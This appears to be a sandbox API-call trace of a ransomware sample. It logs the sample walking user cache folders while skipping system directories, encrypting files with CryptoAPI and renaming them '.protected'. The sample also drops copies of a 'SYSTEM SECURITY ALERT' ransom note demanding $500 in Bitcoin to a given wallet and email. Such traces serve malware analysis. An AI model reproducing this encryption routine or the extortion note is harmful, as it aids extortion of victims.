[0086.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini") returned 110 [0086.935] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0086.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini") returned 110 [0086.935] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0086.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini") returned 110 [0086.935] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0086.935] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.936] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.936] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.936] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.936] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0086.936] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0086.937] CloseHandle 
(hObject=0x154) returned 1 [0086.937] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini.protected") returned 120 [0086.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\desktop.ini.protected")) returned 1 [0086.938] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0086.938] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0086.938] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\RESTORE_FILES.txt") returned 116 [0086.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\VB18B0KB\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\vb18b0kb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.939] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.939] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0086.939] lstrlenA (lpString="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") returned 684 [0086.939] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0086.940] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.940] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0086.940] CloseHandle (hObject=0x150) returned 1 [0086.940] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0086.940] lstrcmpiW (lpString1="XT1RPYG9", lpString2="Windows") returned 1 [0086.940] lstrcmpiW (lpString1="XT1RPYG9", lpString2="Program Files") returned 1 [0086.940] lstrcmpiW (lpString1="XT1RPYG9", lpString2="Program Files (x86)") returned 1 [0086.940] lstrcmpiW (lpString1="XT1RPYG9", lpString2="$Recycle.bin") returned 1 [0086.940] lstrcmpiW (lpString1="XT1RPYG9", lpString2="System Volume Information") returned 1 [0086.940] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9") returned 98 [0086.940] lstrcmpW (lpString1="XT1RPYG9", lpString2=".") returned 1 [0086.940] lstrcmpW (lpString1="XT1RPYG9", lpString2="..") returned 1 [0086.940] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\*") returned 100 [0086.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0086.941] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.941] lstrcmpiW (lpString1=".", lpString2="Program Files") 
returned -1 [0086.941] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.941] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.941] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.941] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\.") returned 100 [0086.941] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.941] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0086.941] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0086.941] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.941] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.941] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.941] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.941] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.941] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.941] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.941] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.941] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\..") returned 101 [0086.941] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.941] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.941] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0086.941] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0086.941] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.941] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.942] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0086.942] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0086.942] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0086.942] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0086.942] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0086.942] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0086.942] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini") returned 110 [0086.942] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0086.942] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0086.942] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0086.942] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0086.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 
[0086.942] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini") returned 110 [0086.942] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0086.942] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini") returned 110 [0086.943] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0086.943] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini") returned 110 [0086.943] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0086.943] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.944] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.944] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x43, lpOverlapped=0x0) returned 1 [0086.944] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.944] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0086.945] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0086.945] CloseHandle 
(hObject=0x154) returned 1 [0086.945] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini.protected") returned 120 [0086.945] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\desktop.ini.protected")) returned 1 [0086.946] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0086.946] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0086.946] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\RESTORE_FILES.txt") returned 116 [0086.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\XT1RPYG9\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\xt1rpyg9\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0086.947] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.947] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0086.948] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.948] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0086.948] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.948] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0086.948] CloseHandle (hObject=0x150) returned 1 [0086.948] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0086.948] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0086.948] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\RESTORE_FILES.txt") returned 107 [0086.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary 
Internet Files\\Content.IE5\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\content.ie5\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0086.949] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.949] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, 
lpOverlapped=0x0) returned 1 [0086.950] lstrlenA (lpString="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") returned 684 [0086.950] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.950] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.950] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0086.950] CloseHandle (hObject=0x14c) returned 1 [0086.951] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0086.951] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0086.951] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\RESTORE_FILES.txt") returned 95 [0086.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.952] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.952] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0086.953] lstrlenA (lpString="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") returned 684 [0086.953] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0086.953] 
